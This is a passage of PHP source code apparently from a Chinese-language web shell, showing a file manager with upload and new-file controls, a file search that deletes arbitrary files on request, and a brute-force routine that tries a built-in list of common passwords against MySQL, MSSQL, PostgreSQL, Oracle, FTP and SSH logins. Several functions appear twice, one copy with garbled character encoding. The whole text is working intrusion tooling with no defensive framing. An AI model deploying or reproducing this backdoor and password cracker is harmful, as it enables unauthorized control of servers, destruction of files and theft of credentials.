html_n("</div>"); break; case "main": css_js("1"); $dir = @dir($path); $REAL_DIR = File_Str(realpath($path)); if (!empty($_POST['actall'])) { echo '<div class="actall">' . File_Act($_POST['files'], $_POST['actall'], $_POST['inver'], $REAL_DIR) . '</div>'; } $NUM_D = $NUM_F = 0; if (!$_SERVER['SERVER_NAME']) { $GETURL = ''; } else { $GETURL = 'http://' . $_SERVER['SERVER_NAME'] . '/'; } $ROOT_DIR = File_Mode(); html_n("<table width=\"100%\" border=0 bgcolor=\"#555555\"><tr><td><form method='GET'>地址:<input type='hidden' name='eanver' value='main'>"); html_n("<input type='text' size='80' name='path' value='{$path}'> <input type='submit' value='转到'></form>"); html_n("<br><form method='POST' enctype=\"multipart/form-data\" action='?eanver=editr&p=" . urlencode($path) . "'>"); html_n("<input type=\"button\" value=\"新建文件\" onclick=\"rusurechk('newfile.php','?eanver=editr&p=" . urlencode($path) . "&refile=1&name=');\"> <input type=\"button\" value=\"新建目录\" onclick=\"rusurechk('newdir','?eanver=editr&p=" . urlencode($path) . "&redir=1&name=');\">"); html_input("file", "upfilet", "", " "); html_input("submit", "uploadt", "上传"); if (!empty($_POST['newfile'])) { if (isset($_POST['bin'])) { $bin = $_POST['bin']; } else { $bin = "wb"; } if (substr(PHP_VERSION, 0, 1) >= 5) { if ($_POST['charset'] == 'GB2312' or $_POST['charset'] == 'GBK') { } else {
function Findfile_j() { if (!empty($_GET['df'])) { echo $_GET['df']; if (@unlink($_GET['df'])) { echo 'ɾ���ɹ�'; } else { @chmod($_GET['df'], 0666); echo @unlink($_GET['df']) ? 'ɾ���ɹ�' : 'ɾ��ʧ��'; } return false; } if (!empty($_GET['fp']) && !empty($_GET['fn']) && !empty($_GET['dim'])) { File_Edit($_GET['fp'], $_GET['fn'], $_GET['dim']); return false; } $SCAN_DIR = isset($_POST['sfp']) ? $_POST['sfp'] : File_Mode(); $SCAN_CODE = isset($_POST['sfc']) ? $_POST['sfc'] : 'config'; $SCAN_TYPE = isset($_POST['sft']) ? $_POST['sft'] : '.mp3|.mp4|.avi|.swf|.jpg|.gif|.png|.bmp|.gho|.rar|.exe|.zip|.pdf|.dll|.exe|.txt|.inf|.ppt|.xls|.js'; print <<<END <form method="POST" name="jform" id="jform" action="?s=j"> <div class="actall">ɨ��·�� <input type="text" name="sfp" value="{$SCAN_DIR}" style="width:600px;"></div> <div class="actall">�����ļ� <input type="text" name="sft" value="{$SCAN_TYPE}" style="width:600px;"></div> <div class="actall">�ؼ��ִ� <input type="text" name="sfc" value="{$SCAN_CODE}" style="width:395px;"> <input type="radio" name="sff" value="a" checked>�����ļ��� <input type="radio" name="sff" value="b">������������</div> <div class="actall" style="height:50px;"><input type="radio" name="sfb" value="a" checked>������Ӧ���ڸ��ļ���,���ļ��к��ļ� <br><input type="radio" name="sfb" value="b">��������Ӧ���ڸ��ļ���</div> <div class="actall"><input type="submit" value="��ʼɨ��" style="width:80px;"></div> </form> END; if (!empty($_POST['sfp']) && !empty($_POST['sfc'])) { echo '<div class="actall">'; $_POST['sft'] = str_replace('.', '\\.', $_POST['sft']); $sff = $_POST['sff'] == 'a' ? true : false; $sfb = $_POST['sfb'] == 'a' ? true : false; echo Findfile_Auto($_POST['sfp'], $_POST['sfc'], $_POST['sft'], $sff, $sfb) ? '��������' : '�쳣��ֹ'; echo '</div>'; } return true; }
function Crack_k() { $MSG_BOX = '等待消息队列......'; $ROOT_DIR = File_Mode(); $SORTS = explode('/', $ROOT_DIR); array_shift($SORTS); $PASS = join(',', $SORTS); //用系统文件夹做密码,用for生成一组纯数字重复密码 by:yoco for ($i = 0; $i < 10; $i++) { $n = (string) $i; $PASS .= $n . $n . $n . $n . $n . $n . ','; $PASS .= $n . $n . $n . $n . $n . $n . $n . ','; $PASS .= $n . $n . $n . $n . $n . $n . $n . $n . ','; } if (!empty($_POST['address']) && !empty($_POST['user']) && !empty($_POST['pass'])) { $SORTPASS = explode(',', $_POST['pass']); $connect = false; $MSG_BOX = 'not found'; for ($k = 0; $k < count($SORTPASS); $k++) { if ($_POST['class'] == 'mysql') { $connect = @mysql_connect($_POST['address'], $_POST['user'], chop($SORTPASS[$k])); } if ($_POST['class'] == 'mssql') { $connect = @mssql_connect($_POST['address'], $_POST['user'], chop($SORTPASS[$k])); } if ($_POST['class'] == 'pgsql') { $connect = @pg_connect("host={$_POST['address']} port=5432 dbname=postgres user={$_POST['user']} password={chop({$SORTPASS[$k]})}"); } if ($_POST['class'] == 'oracle') { $connect = @oci_connect($_POST['user'], chop($SORTPASS[$k]), $_POST['address']); } if ($_POST['class'] == 'ftp') { $Ftp_conn = @ftp_connect($_POST['address'], '21'); $connect = @ftp_login($Ftp_conn, $_POST['user'], chop($SORTPASS[$k])); } if ($_POST['class'] == 'ssh') { $ssh_conn = @ssh2_connect($_POST['address'], '22'); $connect = @ssh2_auth_password($ssh_conn, $_POST['user'], chop($SORTPASS[$k])); } if ($connect) { $MSG_BOX = '[project: ' . $_POST['class'] . '] [ip: ' . $_POST['address'] . '] [user: '******'user'] . '] [pass: '******']'; } } } print <<<END <form method="POST" name="ccform" id="ccform" action="?s=cc"> <div id="msgbox" class="msgbox">{$MSG_BOX}</div> <div class="actall">主机<input type="text" name="address" value="localhost" style="width:300px"></div> <div class="actall">账户<input type="text" name="user" value="root" style="width:300px"></div> <div class="actall">密码<br><textarea name="pass" rows="20" cols="110">root,123456,123123,123321,admin,admin888,admin@admin,root@root,qwer123,5201314,iloveyou,fuckyou,kissme,520520,5845201314,a123456,a123456789,{$PASS}administrator</textarea></div> <div class="actall">方式<input type="radio" name="class" value="mysql" checked>Mysql <input type="radio" name="class" value="mssql" checked>mssql <input type="radio" name="class" value="pgsql" checked>Pgsql <input type="radio" name="class" value="oracle" checked>Oracle <input type="radio" name="class" value="ftp">FTP <input type="radio" name="class" value="ssh" checked>SSH</div> <div class="actall"><input class="bt" type="submit" value="开始"></div></form> END; return true; }
function Findfile_j() { if (!empty($_GET['df'])) { echo $_GET['df']; if (@unlink($_GET['df'])) { echo '删除成功'; } else { @chmod($_GET['df'], 0666); echo @unlink($_GET['df']) ? '删除成功' : '删除失败'; } return false; } if (!empty($_GET['fp']) && !empty($_GET['fn']) && !empty($_GET['dim'])) { File_Edit($_GET['fp'], $_GET['fn'], $_GET['dim']); return false; } $SCAN_DIR = isset($_POST['sfp']) ? $_POST['sfp'] : File_Mode(); $SCAN_CODE = isset($_POST['sfc']) ? $_POST['sfc'] : 'config'; $SCAN_TYPE = isset($_POST['sft']) ? $_POST['sft'] : '.mp3|.mp4|.avi|.swf|.jpg|.gif|.png|.bmp|.gho|.rar|.exe|.zip'; print <<<END <form method="POST" name="jform" id="jform" action="?s=j"> <div class="actall">扫描路径 <input type="text" name="sfp" value="{$SCAN_DIR}" style="width:600px;"></div> <div class="actall">过滤文件 <input type="text" name="sft" value="{$SCAN_TYPE}" style="width:600px;"></div> <div class="actall">关键字串 <input type="text" name="sfc" value="{$SCAN_CODE}" style="width:395px;"> <input type="radio" name="sff" value="a" checked>搜索文件名 <input type="radio" name="sff" value="b">搜索包含文字</div> <div class="actall" style="height:50px;"><input type="radio" name="sfb" value="a" checked>将搜索应用于该文件夹,子文件夹和文件 <br><input type="radio" name="sfb" value="b">仅将搜索应用于该文件夹</div> <div class="actall"><input type="submit" value="开始扫描" style="width:80px;"></div> </form> END; if (!empty($_POST['sfp']) && !empty($_POST['sfc'])) { echo '<div class="actall">'; $_POST['sft'] = str_replace('.', '\\.', $_POST['sft']); $sff = $_POST['sff'] == 'a' ? true : false; $sfb = $_POST['sfb'] == 'a' ? true : false; echo Findfile_Auto($_POST['sfp'], $_POST['sfc'], $_POST['sft'], $sff, $sfb) ? '搜索完毕' : '异常终止'; echo '</div>'; } return true; }
function Crack_k() { $MSG_BOX = 'waiting for message queue......'; $ROOT_DIR = File_Mode(); $SORTS = explode('/', $ROOT_DIR); array_shift($SORTS); $PASS = join(',', $SORTS); for ($i = 0; $i < 10; $i++) { $n = (string) $i; $PASS .= $n . $n . $n . $n . $n . $n . ','; $PASS .= $n . $n . $n . $n . $n . $n . $n . ','; $PASS .= $n . $n . $n . $n . $n . $n . $n . $n . ','; } if (!empty($_POST['address']) && !empty($_POST['user']) && !empty($_POST['pass'])) { $SORTPASS = explode(',', $_POST['pass']); $connect = false; $MSG_BOX = 'not found'; for ($k = 0; $k < count($SORTPASS); $k++) { if ($_POST['class'] == 'mysql') { $connect = @mysql_connect($_POST['address'], $_POST['user'], chop($SORTPASS[$k])); } if ($_POST['class'] == 'ftp') { $Ftp_conn = @ftp_connect($_POST['address'], '21'); $connect = @ftp_login($Ftp_conn, $_POST['user'], chop($SORTPASS[$k])); } if ($_POST['class'] == 'mssql') { $connect = @mssql_connect($_POST['address'], $_POST['user'], chop($SORTPASS[$k])); } // if($_POST['class'] == 'pgsql') $connect = @pg_connect("host=$_POST['address'] port=5432 dbname=postgres user=$_POST['user'] password="******"host={$_POST['address']} port=5432 dbname=postgres user={$_POST['user']} password={chop({$SORTPASS[$k]})}"); } //$connect = @oci_connect('system','oracle','"//localhost/orcl'); if ($_POST['class'] == 'oracle') { $connect = @oci_connect($_POST['user'], chop($SORTPASS[$k]), $_POST['address']); } if ($_POST['class'] == 'ssh') { $ssh_conn = @ssh2_connect($_POST['address'], '22'); $connect = @ssh2_auth_password($ssh_conn, $_POST['user'], chop($SORTPASS[$k])); } if ($connect) { $MSG_BOX = '[project: ' . $_POST['class'] . '] [ip: ' . $_POST['address'] . '] [user: '******'user'] . '] [pass: '******']'; } } } print <<<END <form method="POST" name="kform" id="kform" action="?s=k"> <div id="msgbox" class="msgbox">{$MSG_BOX}</div> <div class="actall">Host <input type="text" name="address" value="localhost" style="width:300px"></div> <div class="actall">User <input type="text" name="user" value="root" style="width:300px"></div> <div class="actall">Pass <textarea name="pass" rows="20" cols="165">{$PASS}root,123456,123123,123321,admin,admin888,admin@admin,root@root,qwer123,5201314,iloveyou,fuckyou,kissme,520520,5845201314,a123456,a123456789</textarea></div> <div class="actall">Crack Project: <input type="radio" name="class" value="mysql" checked>Mysql <input type="radio" name="class" value="ftp">FTP<input type="radio" name="class" value="mssql" checked>mssql<input type="radio" name="class" value="pgsql" checked>Pgsql<input type="radio" name="class" value="oracle" checked>Oracle<input type="radio" name="class" value="ssh" checked>SSH</div> <div class="actall"><input class="bt" type="submit" value="Begin"></div></form> END; return true; }